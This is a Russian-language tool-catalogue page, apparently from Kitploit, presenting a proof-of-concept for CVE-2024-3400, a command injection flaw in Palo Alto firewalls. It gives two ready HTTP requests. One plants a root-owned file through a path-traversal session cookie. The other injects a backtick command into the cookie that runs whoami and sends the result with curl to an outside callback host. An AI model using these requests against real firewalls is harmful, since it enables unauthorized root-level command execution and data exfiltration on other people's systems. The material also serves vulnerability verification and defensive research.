Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-3400-poc — Доказательство концепции эксплуатации CVE-2024-3400, уязвимости внедрения команд в межсетевых экранах Palo Alto, демонстрирующее создание файлов и удалённое выполнение команд с помощью специально сформированных HTTP-запросов. | Kitploit
Инструменты/GitHubGitHub/ghassansabir/cve-2024-3400-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubghassansabir/cve-2024-3400-poc

CVE-2024-3400-poc

Доказательство концепции эксплуатации CVE-2024-3400, уязвимости внедрения команд в межсетевых экранах Palo Alto, демонстрирующее создание файлов и удалённое выполнение команд с помощью специально сформированных HTTP-запросов.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-3400 PoC (инструмент проверки уязвимости)

Описание уязвимости

CVE-2024-3400 — это уязвимость внедрения команд в межсетевых экранах Palo Alto. Отправляя специально сформированный HTTP-запрос, злоумышленник может выполнить произвольные команды на целевом сервере и даже получить root-права.

Шаги по воспроизведению уязвимости

  1. Отправьте следующий HTTP-запрос:
root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

После отправки этого запроса на сервере будет создан файл с именем hellome1337.txt, и этот файл будет иметь root-права.

  1. При попытке доступа к этому файлу должен возвращаться HTTP-статус 403 (доступ запрещён), а не 404 (не найдено).

Скриншоты демонстрируют результат эксплуатации этой уязвимости:

image

image

Пример внедрения команд

Чтобы использовать эту уязвимость для внедрения команд, вы можете отправить следующий HTTP-запрос:

root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Этот запрос выполнит команду whoami на сервере и отправит результат на указанный удалённый сервер (например: xxxxxxxxxxxxxxxxx.oast.fun).

Дополнительное чтение

  • Анализ Rapid7
  • Анализ лаборатории WatchTowr
Скачать инструмент